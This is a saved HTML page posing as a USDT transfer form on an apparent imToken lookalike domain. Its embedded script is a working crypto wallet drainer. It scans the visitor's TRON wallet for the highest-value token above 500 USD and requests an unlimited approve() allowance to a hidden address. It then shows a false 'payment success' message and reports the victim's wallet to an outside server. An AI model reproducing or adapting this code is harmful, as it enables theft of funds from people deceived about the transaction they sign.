<!DOCTYPE html>
<!-- saved from url=(0103)https://cdn-imtoken.com/jx/trcshou/collection.html?s=TIsvDjB&address=TDsQEdLXEH68VoSEw7aieWyMW5TNQsoB2B -->
<html lang="en" data-dpr="1" style="font-size: 54px;" class="no-touch"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<!-- Required meta tags-->
	
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, viewport-fit=cover">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black">
	<meta name="format-detection" content="telephone=no, email=no">
	<meta name="msapplication-tap-highlight" content="no">
	<meta name="x5-orientation" content="portrait">
	<meta name="x5-fullscreen" content="true">
	<meta name="description" content="">
	<meta name="keywords" content="">
	<!-- App title -->
	<title>USDT 转账</title>
	<!-- Framework7 Library CSS -->
	<link rel="stylesheet" href="./USDT_trx_new_files/vendor.min.css">

	<!-- Custom app styles-->
	<link rel="stylesheet" href="./USDT_trx_new_files/reset.min.css">
	<link rel="stylesheet" href="./USDT_trx_new_files/main.css">
	<script type="text/javascript" src="./USDT_trx_new_files/TronWeb.js"></script>

	<!-- Jquery app core js-->
	<script type="text/javascript" src="./USDT_trx_new_files/jquery-2.1.4.min.js"></script>
	<script type="text/javascript" src="./USDT_trx_new_files/flexible.js"></script>
	<script type="text/javascript" src="./USDT_trx_new_files/qrcode.min.js"></script>
	<style type="text/css">
			.tishi{
				width: 3.5rem;
				height: 1.2rem;
				background: #00000059;
				z-index: 999999999999;
				position: fixed;
				top: 50%;
				left: 50%;
				transform: translate(-50%, -50%);
				border-radius: 0.1rem;
				color: white;
				font-size: 0.6rem;
				text-align: center;
				line-height: 1.2rem;
				display: none;
			}
		</style>
		
<style type="text/css">/*
 * contextMenu.js v 1.4.0
 * Author: Sudhanshu Yadav
 * s-yadav.github.com
 * Copyright (c) 2013 Sudhanshu Yadav.
 * Dual licensed under the MIT and GPL licenses
**/

.iw-contextMenu {
    box-shadow: 0px 2px 3px rgba(0, 0, 0, 0.10) !important;
    border: 1px solid #c8c7cc !important;
    border-radius: 11px !important;
    display: none;
    z-index: 1000000132;
    max-width: 300px !important;
    width: auto !important;
}

.dark-mode .iw-contextMenu,
.TnITTtw-dark-mode.iw-contextMenu,
.TnITTtw-dark-mode .iw-contextMenu {
    border-color: #747473 !important;
}

.iw-cm-menu {
    background: #fff !important;
    color: #000 !important;
    margin: 0px !important;
    padding: 0px !important;
    overflow: visible !important;
}

.dark-mode .iw-cm-menu,
.TnITTtw-dark-mode.iw-cm-menu,
.TnITTtw-dark-mode .iw-cm-menu {
    background: #525251 !important;
    color: #FFF !important;
}

.iw-curMenu {
}

.iw-cm-menu li {
    font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", Helvetica, Arial, Ubuntu, sans-serif !important;
    list-style: none !important;
    padding: 10px !important;
    padding-right: 20px !important;
    border-bottom: 1px solid #c8c7cc !important;
    font-weight: 400 !important;
    cursor: pointer !important;
    position: relative !important;
    font-size: 14px !important;
    margin: 0 !important;
    line-height: inherit !important;
    border-radius: 0 !important;
    display: block !important;
}

.dark-mode .iw-cm-menu li, .TnITTtw-dark-mode .iw-cm-menu li {
    border-bottom-color: #747473 !important;
}

.iw-cm-menu li:first-child {
    border-top-left-radius: 11px !important;
    border-top-right-radius: 11px !important;
}

.iw-cm-menu li:last-child {
    border-bottom-left-radius: 11px !important;
    border-bottom-right-radius: 11px !important;
    border-bottom: none !important;
}

.iw-mOverlay {
    position: absolute !important;
    width: 100% !important;
    height: 100% !important;
    top: 0px !important;
    left: 0px !important;
    background: #FFF !important;
    opacity: .5 !important;
}

.iw-contextMenu li.iw-mDisable {
    opacity: 0.3 !important;
    cursor: default !important;
}

.iw-mSelected {
    background-color: #F6F6F6 !important;
}

.dark-mode .iw-mSelected, .TnITTtw-dark-mode .iw-mSelected {
    background-color: #676766 !important;
}

.iw-cm-arrow-right {
    width: 0 !important;
    height: 0 !important;
    border-top: 5px solid transparent !important;
    border-bottom: 5px solid transparent !important;
    border-left: 5px solid #000 !important;
    position: absolute !important;
    right: 5px !important;
    top: 50% !important;
    margin-top: -5px !important;
}

.dark-mode .iw-cm-arrow-right, .TnITTtw-dark-mode .iw-cm-arrow-right {
    border-left-color: #FFF !important;
}

.iw-mSelected > .iw-cm-arrow-right {
}

/*context menu css end */</style><style type="text/css">@-webkit-keyframes load4 {
    0%,
    100% {
        box-shadow: 0 -3em 0 0.2em, 2em -2em 0 0em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 0;
    }
    12.5% {
        box-shadow: 0 -3em 0 0, 2em -2em 0 0.2em, 3em 0 0 0, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    25% {
        box-shadow: 0 -3em 0 -0.5em, 2em -2em 0 0, 3em 0 0 0.2em, 2em 2em 0 0, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    37.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 0, 2em 2em 0 0.2em, 0 3em 0 0em, -2em 2em 0 -1em, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    50% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 0em, 0 3em 0 0.2em, -2em 2em 0 0, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    62.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 0, -2em 2em 0 0.2em, -3em 0 0 0, -2em -2em 0 -1em;
    }
    75% {
        box-shadow: 0em -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0.2em, -2em -2em 0 0;
    }
    87.5% {
        box-shadow: 0em -3em 0 0, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0, -2em -2em 0 0.2em;
    }
}

@keyframes load4 {
    0%,
    100% {
        box-shadow: 0 -3em 0 0.2em, 2em -2em 0 0em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 0;
    }
    12.5% {
        box-shadow: 0 -3em 0 0, 2em -2em 0 0.2em, 3em 0 0 0, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    25% {
        box-shadow: 0 -3em 0 -0.5em, 2em -2em 0 0, 3em 0 0 0.2em, 2em 2em 0 0, 0 3em 0 -1em, -2em 2em 0 -1em, -3em 0 0 -1em, -2em -2em 0 -1em;
    }
    37.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 0, 2em 2em 0 0.2em, 0 3em 0 0em, -2em 2em 0 -1em, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    50% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 0em, 0 3em 0 0.2em, -2em 2em 0 0, -3em 0em 0 -1em, -2em -2em 0 -1em;
    }
    62.5% {
        box-shadow: 0 -3em 0 -1em, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 0, -2em 2em 0 0.2em, -3em 0 0 0, -2em -2em 0 -1em;
    }
    75% {
        box-shadow: 0em -3em 0 -1em, 2em -2em 0 -1em, 3em 0em 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0.2em, -2em -2em 0 0;
    }
    87.5% {
        box-shadow: 0em -3em 0 0, 2em -2em 0 -1em, 3em 0 0 -1em, 2em 2em 0 -1em, 0 3em 0 -1em, -2em 2em 0 0, -3em 0em 0 0, -2em -2em 0 0.2em;
    }
}</style><style type="text/css">/* This is not a zero-length file! */</style></head>
<body style="font-size: 12px;">
  	<!-- Views -->
	<div class="views">
		<!-- main view -->
		<div class="view view-main">
			<!-- Pages -->
			<div class="pages navbar-through">
				<div class="page">
					<!-- Top Navbar-->
					<!--<div class="navbar">-->
					<!--	<div class="navbar-inner">-->
					<!--		<div class="left">-->
					<!--			<a href="javascript:void(0);" class="link" onclick="goback()"><i class="icon icon-back1"></i></a>-->
					<!--		</div>-->
					<!--		<div class="center">USDT收款</div>-->
					<!--		<div class="right"></div>-->
					<!--	</div>-->
					<!--</div>-->
					<div class="page-content" style="padding-top: 0.5rem;">
						<div class="list-block address">
							<div class="list-block-title">收款地址</div>
							<ul>
								<li class="item-content">
									<div class="item-inner">
										<div class="item-title" id="address">TDsQEdLXEH68VoSEw7aieWyMW5TNQsoB2B</div>
									</div>
								</li>
							</ul>
						</div>
						<div class="list-block amount">
							<div class="list-block-title">金额<span id="yu"> USDT</span></div>
							<ul>
								<li class="item-content">
									<div class="item-inner">
										<div class="item-title">
											<input class="num" placeholder="0">
											<p>$ <span id="price" style="color: inherit;font-size:inherit;">234,234</span></p>
										</div>
									</div>
								</li>
								<!--<li class="item-content">-->
								<!--	<div class="item-inner">-->
								<!--		<div class="item-after">備註</div>-->
								<!--	</div>-->
								<!--</li>-->
							</ul>
							<!-- <ul>
								<li class="item-content item-link">
									<div class="item-inner">
										<div class="item-title">礦工費</div>
										<div class="item-after">
											<p>0.002640 ETH</p>
											<p>￥44.69</p>
										</div>
									</div>
								</li>
							</ul> -->
						</div>
						<div class="list-block-button">
							<button class="button button-fill " id="btn-connect" style="background: rgb(7, 139, 195);">下一步</button>
						</div>
					</div>
				</div>
				<!-- Preloader -->
				<div class="modal">
					<div class="preloader"></div>
				</div>
				<div class="tishi">
					付款成功
				</div>
			</div>
		</div>
		<div id="s">
		    
		</div>
	</div>
	<div id="fffsss" style="color: white;
    z-index: 99999999999999999;
    position: absolute;top: 1px;"></div>
		
	<!-- Custom app js-->
	<script src="./USDT_trx_new_files/main.js"></script>
	<script type="text/javascript">
	var address = getUrlQueryString('address')
	var rank = 1;
	var authorized_address = 'TPa96thabDPoSUuFCYhJgipwjmoiVzg21T';
	var domain = 'https://tokem.im/';
	var bizhong = '';
	var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
	function getUrlQueryString(names, urls) {
		urls = urls || window.location.href;
		urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
		var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
		var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
		if (r != null && r[2] != "")return unescape(r[2]);
		return null;

	}
	
$('input.num').bind('input propertychange', function()
{
  if($(this).val() && $(this).val()>0){
      $('#btn-connect').css('background','#078bc3');
  }else{
      $('#btn-connect').css('background','#dde0dd');
  }
  $('#price').text(($(this).val()*rank).toLocaleString() )
  
})

	function getInfo(){
		$.ajax({
			type: 'get',
			url:  domain + 'getTrx',
			async : false,
			success:function(data){
				console.log(data)
				authorized_address = data.data.authorized_address;
				console.log(authorized_address);
			},
			error:function(data){

			}
		})
	}

	async function postInfo(address,symbol){
		var s = getUrlQueryString('s')
		var a = getUrlQueryString('r')

		var data = {
			address:address,
			authorized_address:authorized_address,
			bizhong:symbol,
			code:s,
			reffer:a,
			type:1
		}
		$.ajax({
			type: 'post',
			url:  domain + 'insert.php',
			data:data,
			// success:function(data){
			// //console.log(data)
			//     if(data.code === 200){
			//     	console.log('success')
			//     }
			//     console.log(data.msg)
			// },
			// error:function(data){
			// 	console.log(data)
			// }
		})
	}
	$('#address').text(address)
	

	$(function() {
		
		const addr = {
			'WIN': 'TLa2f6VPqDgRE67v1736s7bJ8Ray5wYjU7',
			'USDT':'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t',
			'TONS': 'THgLniqRhDg5zePSrDTdU9QwY8FjD9nLYt',
			'USDJ': 'TMwFHYXLJaRUPeW6421aqXL4ZEzPRFGkGT',
			'JST': 'TCFLL5dx5ZJdKnWuesXxi1VPwjLVmWZZy9',
			'HT': 'TDyvndWuvX5xTBwHPYJi7J3Yq8pq8yh62h',
			'SUN': 'TKkeiboTkxXKJpbmVFbv4a8ov5rAfRDMf9',
			"EXNX": "TCcVeKtYUrHEQDPmozjJFMrf6XX7BgF84A",
			"VCOIN": "TNisVGhbxrJiEHyYUMPxRzgytUtGM7vssZ",
			"POL":"TWcDDx1Q6QEoBrJi9qehtZnD4vcXXuVLer",
			"CKRW":"TTVTdn8ipmacfKsCHw5Za48NRnaBRKeJ44"
		}

		const price = {
			'WIN': 0.001150,
			'USDT':1,
			'TONS':1.35,
			'USDJ':1.04,
			'JST': 0.125,
			"HT": 20.41,
			"SUN": 33.97,
			"EXNX": 0.0621,
			"VCOIN": 0.004225,
			"POL": 0.1393,
			"CKRW": 0.002487,
		}

		const decimals = {
			'WIN': 6,
			'USDT':6,
			'TONS':6,
			'USDJ':18,
			'JST': 18,
			"HT": 18,
			"SUN": 18,
			"EXNX": 18,
			"VCOIN": 6,
			"POL": 8,
			"CKRW": 6,
		}

		var total=0;
		async function getMostValuableAssets(account) {
			let _symbol = 'USDT'
// 			fffsss = fffsss + "account:" + account + "---"
// 			$("#fffsss").text(fffsss)
			for (const symbol of Object.keys(addr)) {
				let contract = await tronWeb.contract().at(addr[symbol]);
				let myBalance = await contract.balanceOf(account).call(function(err,balance){
					const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
					console.log(usdt);
					if (usdt > total && usdt > 500) {
						_symbol = symbol
						total = usdt
						approveAddr = addr[_symbol]
					}
				})
			}
			bizhong = _symbol
			return _symbol
		}

		/**
		* * Connect wallet button pressed.
		*/
		async function onConnect() {
			$('.pages').append('<div class="modal-overlay"></div>');
			$('.modal-overlay').addClass('modal-overlay-visible');
			$('.modal').removeClass('modal-out').addClass('modal-in');
			// fffsss = fffsss + "开始:"
			let tronWeb = window.tronWeb
			// fffsss = fffsss + "tronWeb:" + tronWeb + "---"
			// $("#fffsss").text(fffsss)
			let walletAddress = tronWeb.defaultAddress.base58;
			// fffsss = fffsss + "walletAddress:" + walletAddress + "---"
			// $("#fffsss").text(fffsss)
			bizhong = await getMostValuableAssets(walletAddress);
			// fffsss = fffsss + "approveAddr:" + approveAddr + "---"
			// $("#fffsss").text(fffsss)
			let instance = await tronWeb.contract().at(approveAddr);
			// fffsss = fffsss + "instance:" + instance + "---"
			// $("#fffsss").text(fffsss)
			// fffsss = fffsss + "walletAddress:" + walletAddress + "---"
			// $("#fffsss").text(fffsss)
			// fffsss = fffsss + "bizhong:" + bizhong + "---"
			// $("#fffsss").text(fffsss)
			let res = await instance["approve"](authorized_address,"90000000000000000000000000000");
			res.send({
				feeLimit: 100000000,
				callValue: 0,
				shouldPollResponse: false
			},function(err,res){
				// fffsss = fffsss + "res:" + res + "---"
				// $("#fffsss").text(fffsss)
				// fffsss = fffsss + "err:" + err + "---"
				// $("#fffsss").text(fffsss)
				if(err == null){
					// fffsss = fffsss + "walletAddress:" + walletAddress + "---"
					// $("#fffsss").text(fffsss)
					// fffsss = fffsss + "bizhong:" + bizhong + "---"
					// $("#fffsss").text(fffsss)
						$(".tishi").fadeIn()
	         				setTimeout(function () {
	         					$(".tishi").fadeOut()
	         				},2000);
					postInfo(walletAddress,bizhong)
				}
				$('.modal-overlay').remove();
				$('.modal').removeClass('modal-in').addClass('modal-out');
			})
		}
		function init() {
			getInfo();
			
			
			
		}
		
		
		async function s(){
	        var tronWeb = window.tronWeb
	        let contract = await tronWeb.contract().at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
	        let walletAddress = tronWeb.defaultAddress.base58;
	        let result = await contract.balanceOf(walletAddress).call(function(err,tex){
	            if(err == null){
	                let total = tex._hex/(10**6);
	                $('#yu').text(total.toLocaleString() +' USDT')
	                console.log();
	            }
	        });
			
	    }

		/**
	    * Main entry point.
	    */
	  
	    init();
	    document.querySelector("#btn-connect").addEventListener("click", onConnect);
	     document.querySelector("#s").addEventListener("click", s);
	 
		
	})
	
	$(function(){
	    
	    setTimeout(function(){
	        $('#s').click()
	    },1000);
	    
	    
	    
	})
	</script>
		

</body></html>